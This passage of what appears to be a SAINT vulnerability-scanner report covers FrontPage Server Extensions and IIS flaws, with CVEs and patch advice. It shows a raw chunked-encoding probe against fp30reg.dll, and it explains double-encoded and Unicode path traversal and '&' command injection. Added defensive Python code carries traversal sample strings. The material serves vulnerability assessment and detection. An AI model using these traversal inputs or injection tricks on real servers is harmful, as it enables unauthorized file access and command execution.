<HTML><BODY>Cannot run the FrontPage Server Extensions' Smart HTML interpreter on this non-HTML page: &quot;&quot;</BODY></HTML>

MS FrontPage Server Extension Vulnerability: remote debug
Severity: Critical Problem CVE: CVE-2003-0822

Updated 04/12/06

Impact

A remote attacker could take control of the web site, and possibly the system as well.

Background

Web servers which include Microsoft FrontPage Server Extensions have special accounts to authenticate web server administrators, web page authors, and web site visitors. The account names and encrypted passwords are stored in FrontPage password files in the /_vti_pvt directory. The password files are named service.pwd on Microsoft web servers, and administrators.pwd, authors.pwd, and users.pwd on Netscape web servers.

An integral feature of FrontPage Server Extensions is a remote debug capability. This functionality enables users to remotely connect to a server running FrontPage Server Extensions and remotely debug content using, for example, Visual InterDev.

FrontPage Server Extensions also come with the SmartHTML (WebBot) interpreter. This functionality is made up of a variety of dynamic link library files, and exists to support certain types of dynamic web content. Web developers may choose to insert a FrontPage WebBot (actually a specially formatted HTML comment) in a web page. When the FrontPage Editor saves the web page, a FrontPage Server Extensions application scans the page for embedded WebBot components and replaces them with the appropriate HTML text.

FrontPage Server Extensions can also include an optional subcomponent called Visual Studio Remote Application Deployment (RAD) support. This support allows Visual InterDev users to register objects on the web server.

The Problem


MS FrontPage Server Extensions cross-site scripting vulnerability

04/12/06
CVE 2006-0015
There is a cross-site scripting vulnerability that could allow an attacker to run client-side script on behalf of an FPSE user. Attempts to exploit this vulnerability require user interaction. An attacker who successfully exploited this vulnerability against an administrator could take complete control of a Front Page Server Extensions 2002 server.


fp30reg.dll Remote Debug Buffer Overflow

11/19/03
CVE 2003-0822
There is a buffer overflow vulnerability in the remote debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions 2000 and 2002. This vulnerability allows remote attackers to execute arbitrary code via a carefully crafted chunked encoded request.


SmartHTML Denial of Service

11/19/03
CVE 2003-0824
A vulnerability in the SmartHTML interpreter (shtml.dll) could allow an attacker to temporarily consume all available CPU resources through malicious HTTP requests.


Buffer overflow in Visual Studio RAD support

CVE 2001-0341
Due to an unchecked buffer in the Visual Studio RAD sub-component of FrontPage Server Extensions, it could be possible for a remote attacker to execute arbitrary commands with IUSR_machinename privileges, or in some cases SYSTEM privileges. This vulnerability can only be exploited if the Visual Studio RAD sub-component is installed, which is not the case by default.


Password File Access

The FrontPage password file(s) indicated on the previous screen, next to the link to this tutorial, are readable by an unprivileged web user. An attacker could crack the encrypted passwords and gain unauthorized access to the web site. If any users' FrontPage passwords are the same as their system passwords, the system could be compromised as well.


fpcount.exe buffer overflow

10/22/02
CVE 1999-1376
The fpcount.exe utility which is installed with FrontPage Server Extensions versions prior to 98 contains a remotely exploitable buffer overflow vulnerability.

Resolutions

To fix the Front Page Service Extensions Cross-site scripting vulnerability and the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, apply the patch indicated in Microsoft Security Bulletin 06-017.

To fix the vulnerability in the Visual Studio RAD support, apply the patch indicated in Microsoft Security Bulletin 01-035.

To secure the FrontPage password file, set the permissions on the file(s) to be more restrictive. The exact permissions which should be used are not specified. Use the most restrictive permissions possible without denying access to legitimate users.

On Windows NT systems:

  1. Find the file in Windows Explorer
  2. Click on the file with the right mouse button
  3. Select Properties
  4. Click on the Security Tab
  5. Click on the Permissions button
  6. Change or remove permissions on the file as necessary.

On Unix systems:

Use the chmod command.

To fix the buffer overflow in fpcount.exe, upgrade to FrontPage Server Extensions 98 or higher.

Where can I read more about this?

For more information on the FrontPage Server Extensions cross-site scripting vulnerabilities see Microsoft Security Bulletin 06-017 and Bugtraq ID 17452.

For more information on the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, see Microsoft Security Bulletin 03-051 and Secunia Advisory SA10195.

For more information on the vulnerability in the Visual Studio RAD support, see Microsoft Security Bulletin 01-035 and NSFOCUS Security Advisory 2001-03.

See the Rhino 9 Advisory for more information about the password file vulnerability.

The fpcount.exe vulnerability was posted to Bugtraq archive 11943.

Technical Details

Service: http
Sent:
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.0
Host: host1.domain.com:80
Transfer-Encoding: chunked

1

X
0



Received:
HTTP/1.1 400 Bad Request

Folder traversal in IIS (Double Decoding)
Severity: Critical Problem CVE: CVE-2001-0333

Updated 10/15/08

Impact

An attacker could send a specially constructed request which crashes the server or executes arbitrary code with the privileges of the web server.

Background

Microsoft IIS web servers accept requests for a number of different types of files. The most common methods of requesting a file are GET and POST. In addition to the request itself, the web browser sends the IIS server additional information called headers which are not seen by the user. Information in the header can include browser type, content type, content length, and other information.

Some of the file types for which IIS may accept requests are .HTR files (for remote administration of passwords), .IDC files (Internet Database Connectors), .STM files (server side include files), .PRINTER files (printers), .IDA files (Internet Data Administration), .IDQ files (Internet Data Query), and .ASP files (Active Server Pages). Whenever any file of one of these types is requested by a client, a corresponding DLL file is executed on the server, regardless of whether or not the requested file actually exists on the server.

IIS supports redirection, which allows a user to specify that requests for a particular URL on the server should be redirected such that the user's browser loads a file from another directory, a network share, or a URL on another web server.

The Problems


Integer Overflow in IPP Service

10/15/08
CVE 2008-1446
MS08-062 fixes a vulnerability in ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 that could allow a remote, authenticated attacker to execute arbitrary code via an HTTP POST request.


IIS ASP Remote Code Execution

02/14/08
CVE 2008-0075
Microsoft Security Bulletin 08-006 announced a vulnerability in IIS that could allow remote code execution. The vulnerability exists in the way that IIS handles input to ASP Web pages. An attacker who could exploit the vulnerability can perform actions on the IIS server with the same rights as the Worker Process Identity (WPI).


Remote Code Execution in IIS 5.1

07/10/07
CVE 2005-4360
A flaw in IIS 5.1 dealing with .dll requests was previously believed to only allow denial of service but has been re-evaluated by Microsoft and determined to allow remote code execution.


ASP Upload Command Execution

07/12/06
CVE 2006-0026
IIS 5.0, 5.1, and 6.0 are affected by a buffer overflow when processing ASP files. A remote attacker could execute arbitrary commands by uploading a specially crafted ASP file onto the web server, and then causing IIS to process it. An attacker would need to have valid login credentials in order to exploit this vulnerability unless the web server has been configured to allow anonymous uploads to the web site.


.dll Request Denial of Service in IIS 5.1

12/21/05
CVE 2005-4360
A flaw in IIS 5.1 could allow a remote attacker to terminate the web service by sending a specially crafted request for a .dll file four times in succession. The requested path must include an executable virtual directory on the web server, but the file does not need to exist in order for the attack to succeed. In its default configuration, IIS will restart after such an attack, but repeated attacks could lead to a sustained denial of service.


Multiple Vulnerabilities in IIS 4.0 - 5.1

04/11/02
Microsoft Security Bulletin 02-018 announced ten newly discovered vulnerabilities affecting IIS 4.0 through 5.1, ranging in impact from denial of service to execution of arbitrary code. Each of the following vulnerabilities affects IIS 4.0, 5.0, and/or 5.1:

  • Two buffer overflows affecting chunked encoding transfers via Active Server Pages (ASP) (CVE 2002-0079 CVE 2002-0147)
  • A buffer overflow in the processing of HTTP headers by spoofing the check of the delimiter fields (CVE 2002-0150)
  • A buffer overflow in the processing of server-side includes in ASP files (CVE 2002-0149)
  • A buffer overflow affecting the HTR ISAPI extension (CVE 2002-0071)
  • Denial-of-service conditions in the processing of error messages from ISAPI extensions and the processing of FTP status requests (CVE 2002-0072 CVE 2002-0073)
  • Three cross-site scripting vulnerabilities (CVE 2002-0074 CVE 2002-0075 CVE 2002-0148)

11/05/02
Microsoft Security Bulletin 02-062 announced four more vulnerabilities affecting IIS 4.0, 5.0, and/or 5.1:

  • A privilege elevation vulnerability affecting the way ISAPIs are launched when configured to run out of process (CVE 2002-0869)
  • A denial-of-service vulnerability in the processing of WebDAV requests (CVE 2002-1182)
  • An error which weakens the access control on uploading of .COM files to write-enabled virtual directories (CVE 2002-1180)
  • Two cross-site scripting vulnerabilities affecting the administrative web page (CVE 2002-1181)

06/03/03
Microsoft Security Bulletin 03-018 announced four more vulnerabilities affecting IIS 4.0, 5.0, and/or 5.1:

  • A cross-site scripting vulnerability affecting pages which are redirected to another page (CVE 2003-0223)
  • A buffer overflow in the processing of pages containing server-side includes, which could be exploited if an attacker is able to upload such pages (CVE 2003-0224)
  • A denial of service vulnerability in the processing of ASP pages, which could be exploited if an attacker is able to upload ASP pages (CVE 2003-0225)
  • A denial of service vulnerability in the processing of overly long WebDAV requests (CVE 2003-0226)


IIS 4.0 Redirection Buffer Overflow

07/14/04
CVE 2004-0205
A buffer overflow in IIS 4.0 could allow a remote attacker to execute arbitrary commands if permanent redirects are enabled. IIS 5 and 6 are not affected.


Chunked .HTR buffer overflow

06/13/02
CVE 2002-0364
IIS web servers support chunked encoding, in which HTTP POST data is sent to the server in multiple parts. A heap overrun vulnerability in the ISAPI filter which handles requests for .HTR files could allow a remote attacker to execute arbitrary commands when chunked encoding is used. The requested .HTR file usually does not need to exist on the server in order for the vulnerability to be exploited.

IIS 4.0 and 5.0 are affected by this vulnerability if the .HTR application filter is enabled and the patch has not been applied. This is not the same vulnerability as the one described above.
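As an added illustration (not SAINT's or Microsoft's code), the following is a bounded chunked-body decoder of the kind a server needs when it accepts chunked POST data: every client-supplied chunk size is validated against a fixed limit before any data is copied, which is the check a parser must make to avoid the class of overrun described here. It is run over the probe body shown under Technical Details above; the size limits and the names `decode_chunked` and `rejects` are assumptions.

```python
# Assumed limits; a real server takes these from its configuration
MAX_CHUNK_SIZE = 64 * 1024
MAX_BODY_SIZE = 1024 * 1024

class ChunkedError(ValueError):
    """Malformed or over-limit chunked body."""

def decode_chunked(raw, max_chunk=MAX_CHUNK_SIZE, max_body=MAX_BODY_SIZE):
    """Decode a chunked body; every client-supplied size is checked before use."""
    body = bytearray()
    pos = 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            raise ChunkedError("truncated chunk-size line")
        size_field = raw[pos:end].split(b";", 1)[0].strip()  # drop chunk extensions
        if not size_field or any(c not in b"0123456789abcdefABCDEF" for c in size_field):
            raise ChunkedError("malformed chunk size %r" % size_field)
        size = int(size_field, 16)  # Python ints never wrap; compare to the limit explicitly
        if size > max_chunk:
            raise ChunkedError("chunk size %d exceeds limit %d" % (size, max_chunk))
        pos = end + 2
        if size == 0:  # last-chunk: skip optional trailer lines up to the blank line
            while True:
                end = raw.find(b"\r\n", pos)
                if end < 0:
                    raise ChunkedError("truncated trailer")
                line, pos = raw[pos:end], end + 2
                if not line:
                    return bytes(body)
        if len(body) + size > max_body:
            raise ChunkedError("body exceeds limit %d" % max_body)
        chunk = raw[pos:pos + size]
        if len(chunk) < size:
            raise ChunkedError("chunk data shorter than declared size")
        body += chunk
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ChunkedError("missing CRLF after chunk data")
        pos += 2

def rejects(raw):  # True if the decoder refuses `raw`
    try:
        decode_chunked(raw)
    except ChunkedError:
        return True
    return False

# Body of the probe shown under Technical Details, with CRLF endings: one 1-byte chunk "X", then the terminator
PROBE_BODY = b"1\r\nX\r\n0\r\n\r\n"
```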


Buffer Overflows in IIS 5.0

06/18/01
CVE 2001-0241
CVE 2001-0500

The DLLs which IIS 5.0 uses to process requests for .PRINTER files on Windows 2000, and for .IDA and .IDQ files on any Windows platform that has Indexing Services installed, contain buffer overflows. A remote attacker could execute arbitrary commands with full system privileges or create a denial of service by sending a specially crafted request for a .PRINTER, .IDA, or .IDQ file. In most cases the requested file does not need to exist on the web server in order for this vulnerability to be exploited, and exploitation of the DLLs that come with Indexing Services is possible even if Indexing Services are not running.

Due to the nature of this vulnerability, it could not be confirmed by a network scan (unless the dangerous tests option was chosen). The server is not vulnerable if any of the following conditions apply:

  • The patches for this vulnerability have already been applied
  • The mappings for the corresponding ISAPIs have been removed
Furthermore, IIS 4.0 servers are not affected by this vulnerability but are affected by a similar vulnerability. (See below.)


Folder Traversal in IIS 4.0 and 5.0

CVE 2000-0884
CVE 2001-0333

The "../" string in a pathname usually indicates a parent directory. IIS rejects URLs containing this string, thereby preventing web users from accessing files outside of the web document root directory. However, this safeguard can be circumvented by:

  1. Representing part of the ../ string in a Unicode format, or
  2. Using double encoding; that is, URL-encoding part of the ../ string, and then URL-encoding the resulting encoded string
Using either of these two exploits, it is possible for a remote user to bypass the safeguard and gain unauthorized access to any file or system command located on the same logical drive as the web root directory. The attacker would have the privileges of the IUSR_machinename account, where machinename is the name of the system. This account, if included in the Everyone and Users groups, could be used to execute almost any command on the system.
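To show how a defender can recognise these two encodings in request paths, here is an added example (not part of the SAINT report) that canonicalises a URL path by percent-decoding it repeatedly until it stops changing, treats invalid or overlong UTF-8 as a finding, and then checks the decoded segments for a parent-directory reference. The sample paths are constructed, and the function names and round limit are assumptions.

```python
from urllib.parse import unquote_to_bytes

MAX_DECODE_ROUNDS = 3  # assumed cap: a legitimate path needs at most one round

def canonicalize_path(path):
    """Percent-decode `path` repeatedly until it stops changing, so that a
    sequence hidden behind a second layer of encoding surfaces as plain text.
    Returns (decoded_path, findings)."""
    findings = []
    current = path
    for round_no in range(1, MAX_DECODE_ROUNDS + 1):
        raw = unquote_to_bytes(current)
        try:
            decoded = raw.decode("utf-8")  # strict: overlong forms are rejected
        except UnicodeDecodeError:
            findings.append("invalid or overlong UTF-8 after decoding")
            decoded = raw.decode("utf-8", errors="replace")
        if decoded == current:
            break
        if round_no >= 2:
            findings.append("needed %d decoding rounds (double encoding)" % round_no)
        current = decoded
    # IIS treats backslash like slash, so normalise before looking at segments
    segments = current.replace("\\", "/").split("/")
    if ".." in segments:
        findings.append("parent-directory reference after decoding")
    return current, findings

def is_suspicious(path):
    return bool(canonicalize_path(path)[1])

# Constructed request paths of the kind found in an IIS access log
SAMPLE_PATHS = [
    "/images/logo.gif",
    "/docs/a%20b.txt",
    "/scripts/..%255c..%255csecret.txt",
    "/scripts/..%c0%af../secret.txt",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        decoded, findings = canonicalize_path(p)
        print(p, "->", decoded, findings or "clean")
```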


Buffer Overflows in IIS 4.0

CVE 1999-0874

In Microsoft IIS version 4.0, the DLL files which are executed when .HTR, .IDC, or .STM files are requested have a buffer overflow condition which could allow an attacker to crash the server or execute arbitrary commands on the web server.

This vulnerability could not be confirmed by a remote scan. The server is not vulnerable to this attack if any of the following conditions exist:

  • Windows NT 4.0 Service Pack 6 has been applied
  • The ext-fix hotfix has been applied
  • The workaround for this problem has been applied. That is, "check if this file exists" has been selected for each of the affected file types
  • The following three files do not exist on the server: ism.dll, ssinc.dll, and httpodbc.dll

If none of the above conditions exist, then the server is probably vulnerable.

CVE 2000-0226
An older buffer overflow affects IIS 4.0's implementation of chunked encoding and could allow an attacker to cause a denial of service with a large POST or PUT command.


Filename Inspection Vulnerability

CVE 2000-0886

When the web server receives a request for a .exe or .com file under an executable directory, the system calls cmd.exe to process the requested program. Anything following the filename in the request is interpreted as a command-line argument. Some arguments, such as an ampersand (&), could cause the remaining arguments to be interpreted as a new command. Thus, if an attacker knows the path and filename of a batch or .cmd file under an executable directory, he or she could run arbitrary commands by sending a specially crafted request for that file.

Similarly, script interpreters such as perl.exe and php.exe could be tricked into running arbitrary commands by a specially crafted request for the corresponding type of file.


Other vulnerabilities in IIS 4 and 5

CVE 2000-0770
CVE 2001-0151
CVE 2001-0507
There are several other vulnerabilities in IIS 4 and 5 which are not as critical as those listed above, but which still should be addressed. The first could allow an attacker to gain additional privileges to a file in IIS 4.0 and 5.0 by sending a specially crafted URL if a parent directory has less restrictive permissions than the file. The second could allow an attacker to create a denial of service against IIS 5.0 by sending a malformed WebDAV request to the server. The third is a privilege elevation vulnerability which arises in IIS 5.0 because the table that specifies which files can be run in-process uses both absolute and relative path names, allowing a file which is not in the table to possibly match a file name in the table.

Resolutions

Install the patches referenced in Microsoft Security Bulletins 03-018, 06-034 (for Windows 2000), 08-006 (for Windows 2003 and XP), and 08-062.

For IIS 5.1, also install the patches referenced in 07-041. Note that the patch referenced in Microsoft Security Bulletin 02-050 must also be installed if client side certificates are to function.

IIS 4.0 users should also install the patch referenced in Microsoft Security Bulletin 04-021 or disable the permanent redirection option under the Home Directory tab in the web site properties.

Where can I read more ab